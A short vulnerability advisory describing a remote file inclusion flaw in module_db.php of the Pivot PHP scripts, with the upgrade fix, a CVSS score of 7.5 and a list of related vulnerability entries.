Summary
Pivot is a set of PHP scripts designed to maintain dynamic web pages.
There is a flaw in the file module_db.php which may let an attacker execute arbitrary commands on the remote host by forcing the remote Pivot installation to include a PHP file hosted on an arbitrary third-party website.
Solution
Upgrade to Pivot 1.14.1 or disable this CGI altogether
Severity
Classification
-
CVSS Base Score: 7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
Related Vulnerabilities
- Ajax File and Image Manager 'data.php' PHP Code Injection Vulnerability
- Atutor AChecker Multiple SQL Injection and XSS Vulnerabilities
- Avenger's News System Command Execution
- AV Arcade 'ava_code' Cookie Parameter SQL Injection Vulnerability
- AlienVault Open Source SIEM (OSSIM) 'timestamp' Parameter Directory Traversal Vulnerability